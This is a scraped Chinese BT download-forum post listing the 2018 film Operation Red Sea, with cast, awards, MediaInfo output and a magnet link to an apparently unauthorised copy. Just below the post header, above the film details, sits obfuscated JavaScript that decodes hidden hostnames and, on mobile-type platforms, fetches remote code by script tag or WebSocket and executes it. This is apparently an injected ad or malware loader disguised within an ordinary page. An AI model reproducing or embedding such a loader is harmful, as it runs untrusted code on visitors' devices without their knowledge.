红海行动[国语中字].Operation.Red.Sea.2018.2160p.WEB-DL.H265.AAC 15.98GB

版主小s 1月前 201

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 红海行动 / 刀锋·红海行动 / 红海风暴 / Operation Red Sea
◎年  代 2018
◎产  地 中国大陆 / 中国香港
◎类  别 动作 / 战争
◎语  言 汉语普通话 / 阿拉伯语 / 英语 / 索马里语 / 粤语
◎上映日期 2018-02-16(中国大陆) / 2020-07-24(中国大陆重映)
◎IMDb链接 https://www.imdb.com/title/tt6878882/
◎豆瓣评分 8.2/10 (917116人评价)
◎豆瓣链接 https://movie.douban.com/subject/26861685/
◎片  长 138分钟
◎导  演 林超贤 Dante Lam (id:1275075)
◎编  剧 冯骥 Ji Feng (id:1322804)
       陈珠珠 Zhuzhu Chen (id:1343155)
       林明杰 Eric Lin (id:1374637)
◎演  员 张译 Yi Zhang (id:1274761)
       黄景瑜 Johnny Huang (id:1354442)
       海清 Qing Hai (id:1272245)
       杜江 Jiang Du (id:1322949)
       蒋璐霞 Luxia Jiang (id:1313597)
       尹昉 Fang Yin (id:1340310)
       王强 Qiang Wang (id:1313047)
       郭家豪 Jiahao Guo (id:1326477)
       王雨甜 Yutian Wang (id:1377802)
       麦亨利 Henry Mai (id:1377803)
       张涵予 Hanyu Zhang (id:1274319)
       王彦霖 Yanlin Wang (id:1350317)
       霍思燕 Siyan Huo (id:1000145)
       任达华 Simon Yam (id:1031194)
       黄芬芬  (id:1389040)
       于大伟 David Yu (id:1389166)
       李响 Xiang Li (id:1402566)
       蔡洁 Jacky Cai (id:1339078)
       梁凤英 Candy Leung (id:1326682)
       唐静 Jing Tang (id:1322732)
       于冬 Dong Yu (id:1317865)
       周绰华 Alvin Chow (id:1425958)
       陆振华 Zhenhua Lu (id:1344387)
       冯远文 Yuen Man Fung (id:1369778)
       黄永恒 Wing-Hung Wong (id:1300411)
       蔡志雄 Chi-Hung Choi (id:1410795)
       林志恒 Lam Chi Hang (id:1410796)
       诺帕瓦特·里基特王 Nopawat Likitwong (id:1330579)
       萨荣育·拿恩赛 Sarunyu Nurnsai (id:1410803)
       朗纳猜·昌斯里 Ronnachai Changsri (id:1409230)
       姜泰均 Tae-gyun Kang (id:1410806)
       林超贤 Dante Lam (id:1275075)
       黄伟亮 Jack Wai Leung Wong (id:1355922)
       凌志华 Chi Wah Ling (id:1335020)
       徐添发 Frank See (id:1411227)

◎标  签 军事 / 热血 / 战争 / 特种部队 / 爱国 / 中国大陆 / 动作 / 真实事件改编

◎简  介
  中东国家伊维亚共和国发生政变,武装冲突不断升级。刚刚在索马里执行完解救人质任务的海军护卫舰临沂号,受命前往伊维亚执行撤侨任务。舰长高云(张涵予 饰)派出杨锐(张译 饰)率领的蛟龙突击队登陆战区,护送华侨安全撤离。谁知恐怖组织扎卡却将撤侨部队逼入交火区,一场激烈的战斗在所难免。与此同时,法籍华人记者夏楠(海清 饰)正在伊维亚追查威廉·柏森博士贩卖核原料的事实,而扎卡则突袭柏森博士所在的公司,意图抢走核原料。混战中,一名隶属柏森博士公司的中国员工成为人质。为了解救该人质,八名蛟龙队员必须潜入有150名恐怖分子的聚集点,他们用自己的信念和鲜血铸成中国军人顽强不屈的丰碑!                                    
                                本片根据也门撤侨事件改编。

◎获奖情况 (共40项)
  第38届香港电影金像奖 (2019)
  最佳电影(提名)
   └──林超贤 (id:1275075)
  最佳导演(提名)
   └──林超贤 (id:1275075)
  最佳女配角(提名)
   └──蒋璐霞 (id:1313597)
  最佳摄影(提名)
  最佳剪接(提名)
  最佳动作设计
   └──林超贤 (id:1275075)
  最佳音响效果
  最佳视觉效果

  第32届中国电影金鸡奖 (2019)
  最佳故事片(提名)
  最佳导演
   └──林超贤 (id:1275075)
  最佳女配角(提名)
   └──蒋璐霞 (id:1313597)

  第34届大众电影百花奖 (2018)
  最佳故事片
  最佳导演
   └──林超贤 (id:1275075)
  最佳编剧(提名)
  最佳男主角(提名)
   └──张译 (id:1274761)
  最佳女主角(提名)
   └──海清 (id:1272245)
  最佳男配角
   └──杜江 (id:1322949)
  最佳男配角(提名)
   └──张涵予 (id:1274319)
  最佳女配角
   └──蒋璐霞 (id:1313597)
  最佳新人
   └──王雨甜 (id:1377802)
  最佳新人(提名)
   └──黄景瑜 (id:1354442)

  第17届中国电影华表奖 (2018)
  优秀故事片奖
  优秀导演奖
   └──林超贤 (id:1275075)
  优秀编剧奖(提名)
   └──林超贤 (id:1275075)

  第13届亚洲电影大奖 (2019)
  最高票房亚洲电影大奖
  最佳新演员
   └──黄景瑜 (id:1354442)
  最佳剪接(提名)
  最佳视觉效果(提名)
  最佳音响(提名)

  第8届北京国际电影节 (2018)
  天坛奖 最佳视觉效果奖
  天坛奖(提名)
   └──林超贤 (id:1275075)

  第14届中国长春电影节 (2018)
  金鹿奖 最佳华语故事片
  金鹿奖 最佳女配角
   └──蒋璐霞 (id:1313597)
  金鹿奖 最佳摄影
   └──冯远文 (id:1369778)

  第25届北京大学生电影节 (2018)
  最佳影片奖
  最佳男演员奖(提名)
   └──张译 (id:1274761)
  最佳观赏效果奖(提名)

  第5届豆瓣电影年度榜单 (2018)
  评分最高的华语电影(提名)
  最受关注的院线电影(提名)

  第4届豆瓣电影年度榜单 (2017)
  最值得期待的华语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 红海行动[email protected]p4

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 16.0 GiB

  8. Duration                                 : 2 h 18 min

  9. Overall bit rate                         : 16.5 Mb/s

  10. Writing application                      : Lavf58.32.104


  11. Video

  12. ID                                       : 1

  13. Format                                   : HEVC

  14. Format/Info                              : High Efficiency Video Coding

  15. Format profile                           : [email protected]@Main

  16. Codec ID                                 : hev1

  17. Codec ID/Info                            : High Efficiency Video Coding

  18. Duration                                 : 2 h 18 min

  19. Bit rate                                 : 16.4 Mb/s

  20. Width                                    : 3 840 pixels

  21. Height                                   : 1 600 pixels

  22. Display aspect ratio                     : 2.40:1

  23. Frame rate mode                          : Constant

  24. Frame rate                               : 120.000 FPS

  25. Color space                              : YUV

  26. Chroma subsampling                       : 4:2:0

  27. Bit depth                                : 8 bits

  28. Bits/(Pixel*Frame)                       : 0.022

  29. Stream size                              : 15.8 GiB (99%)

  30. Color range                              : Limited

  31. Color primaries                          : BT.709

  32. Transfer characteristics                 : BT.709

  33. Matrix coefficients                      : BT.709

  34. Codec configuration box                  : hvcC


  35. Audio

  36. ID                                       : 2

  37. Format                                   : AAC LC

  38. Format/Info                              : Advanced Audio Codec Low Complexity

  39. Codec ID                                 : mp4a-40-2

  40. Duration                                 : 2 h 18 min

  41. Bit rate mode                            : Constant

  42. Bit rate                                 : 126 kb/s

  43. Channel(s)                               : 2 channels

  44. Channel layout                           : L R

  45. Sampling rate                            : 44.1 kHz

  46. Frame rate                               : 43.066 FPS (1024 SPF)

  47. Compression mode                         : Lossy

  48. Stream size                              : 124 MiB (1%)

  49. Default                                  : Yes

  50. Alternate group                          : 1



TAGS 动作 战争

磁力链:
  • magnet:?xt=urn:btih:BCE1D185180D677C55B0CBEFDE8DA760E5E04EE6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖